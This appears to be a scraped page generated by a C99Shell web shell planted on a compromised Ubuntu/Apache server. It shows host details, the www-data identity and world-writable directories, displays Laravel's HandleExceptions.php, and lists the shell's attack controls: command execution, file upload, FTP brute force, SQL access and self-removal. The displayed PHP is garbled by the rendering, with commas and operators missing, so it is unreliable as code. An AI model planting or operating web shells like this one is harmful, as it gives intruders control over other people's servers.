!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/dokan/script/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/   drwxrwxrwx
Free 13.18 GB of 57.97 GB (22.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     HandleExceptions.php (4.11 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Illuminate\Foundation\Bootstrap;

use 
ErrorException;
use 
Exception;
use 
Illuminate\Contracts\Debug\ExceptionHandler;
use 
Illuminate\Contracts\Foundation\Application;
use 
Symfony\Component\Console\Output\ConsoleOutput;
use 
Symfony\Component\ErrorHandler\Error\FatalError;
use 
Throwable;

class 
HandleExceptions
{
    
/**
     * Reserved memory so that errors can be displayed properly on memory exhaustion.
     *
     * @var string
     */
    
public static $reservedMemory;

    
/**
     * The application instance.
     *
     * @var \Illuminate\Contracts\Foundation\Application
     */
    
protected $app;

    
/**
     * Bootstrap the given application.
     *
     * @param  \Illuminate\Contracts\Foundation\Application  $app
     * @return void
     */
    
public function bootstrap(Application $app)
    {
        
self::$reservedMemory str_repeat('x'10240);

        
$this->app $app;

        
error_reporting(-1);

        
set_error_handler([$this'handleError']);

        
set_exception_handler([$this'handleException']);

        
register_shutdown_function([$this'handleShutdown']);

        if (! 
$app->environment('testing')) {
            
ini_set('display_errors''Off');
        }
    }

    
/**
     * Convert PHP errors to ErrorException instances.
     *
     * @param  int  $level
     * @param  string  $message
     * @param  string  $file
     * @param  int  $line
     * @param  array  $context
     * @return void
     *
     * @throws \ErrorException
     */
    
public function handleError($level$message$file ''$line 0$context = [])
    {
        if (
error_reporting() & $level) {
            throw new 
ErrorException($message0$level$file$line);
        }
    }

    
/**
     * Handle an uncaught exception from the application.
     *
     * Note: Most exceptions can be handled via the try / catch block in
     * the HTTP and Console kernels. But, fatal error exceptions must
     * be handled differently since they are not normal exceptions.
     *
     * @param  \Throwable  $e
     * @return void
     */
    
public function handleException(Throwable $e)
    {
        try {
            
self::$reservedMemory null;

            
$this->getExceptionHandler()->report($e);
        } catch (
Exception $e) {
            
//
        
}

        if (
$this->app->runningInConsole()) {
            
$this->renderForConsole($e);
        } else {
            
$this->renderHttpResponse($e);
        }
    }

    
/**
     * Render an exception to the console.
     *
     * @param  \Throwable  $e
     * @return void
     */
    
protected function renderForConsole(Throwable $e)
    {
        
$this->getExceptionHandler()->renderForConsole(new ConsoleOutput$e);
    }

    
/**
     * Render an exception as an HTTP response and send it.
     *
     * @param  \Throwable  $e
     * @return void
     */
    
protected function renderHttpResponse(Throwable $e)
    {
        
$this->getExceptionHandler()->render($this->app['request'], $e)->send();
    }

    
/**
     * Handle the PHP shutdown event.
     *
     * @return void
     */
    
public function handleShutdown()
    {
        if (! 
is_null($error error_get_last()) && $this->isFatal($error['type'])) {
            
$this->handleException($this->fatalErrorFromPhpError($error0));
        }
    }

    
/**
     * Create a new fatal error instance from an error array.
     *
     * @param  array  $error
     * @param  int|null  $traceOffset
     * @return \Symfony\Component\ErrorHandler\Error\FatalError
     */
    
protected function fatalErrorFromPhpError(array $error$traceOffset null)
    {
        return new 
FatalError($error['message'], 0$error$traceOffset);
    }

    
/**
     * Determine if the error type is fatal.
     *
     * @param  int  $type
     * @return bool
     */
    
protected function isFatal($type)
    {
        return 
in_array($type, [E_COMPILE_ERRORE_CORE_ERRORE_ERRORE_PARSE]);
    }

    
/**
     * Get an instance of the exception handler.
     *
     * @return \Illuminate\Contracts\Debug\ExceptionHandler
     */
    
protected function getExceptionHandler()
    {
        return 
$this->app->make(ExceptionHandler::class);
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0049 ]--